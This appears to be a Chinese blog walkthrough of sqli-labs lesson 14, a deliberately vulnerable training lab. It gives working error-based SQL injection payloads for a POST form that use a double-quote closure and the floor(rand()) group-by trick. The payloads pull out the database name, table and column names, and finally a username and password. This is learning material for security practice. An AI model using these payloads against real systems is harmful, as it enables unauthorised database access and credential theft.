zoukankan      html  css  js  c++  java
  • sqli-lab(14)

    POST型的 双注入

    0X01随便测试一下

    在password输入"会报错  "#就不报错了 那么应该是“”的闭合

    但是没有回显的值 只有报错的信息 那我们是不是该考虑从报错的语句里面来得到我们的答案

    0X02爱之初实验

    爆库名

    " union select count(*),concat_ws('*',(select database()),floor(rand()*2)) as a from information_schema.tables group by a#

    有数据库后 开始爆破表名

    " union select count(*),concat_ws(';',(select table_name from information_schema.tables where table_schema='security'),floor(rand()*2)) as a from information_schema.tables group by a#

    limit绕吧 这是不是个数问题 不能用group绕

    " union select count(*),concat_ws(';',(select table_name from information_schema.tables where table_schema='security' limit 0,1),floor(rand()*2)) as a from information_schema.tables group by a#

    得到表名后

    爆列名

    " union select count(*),concat_ws(';',(select column_name from information_schema.columns where table_name='users' limit 0,1),floor(rand()*2)) as a from information_schema.tables group by a#

    last 爆破字段 --第一个用户名和密码

    " union select count(*),concat_ws(',',(select username from users limit 0,1),(select password from users limit 0,1),floor(rand()*2)) as a from information_schema.tables group by a#

  • 相关阅读:
    ios -- 教你如何轻松学习Swift语法(一)
    collectionView,tableView的细节处理
    主流界面搭建原理(类似百思不得姐主界面)
    ios--时间格式化(cell业务逻辑处理)
    test
    Mac下安装Matlab R2015b
    最大奇约数
    编码问题
    最优二叉查找树
    二维数组和二级指针
  • 原文地址:https://www.cnblogs.com/-zhong/p/10921333.html
Copyright © 2011-2022 走看看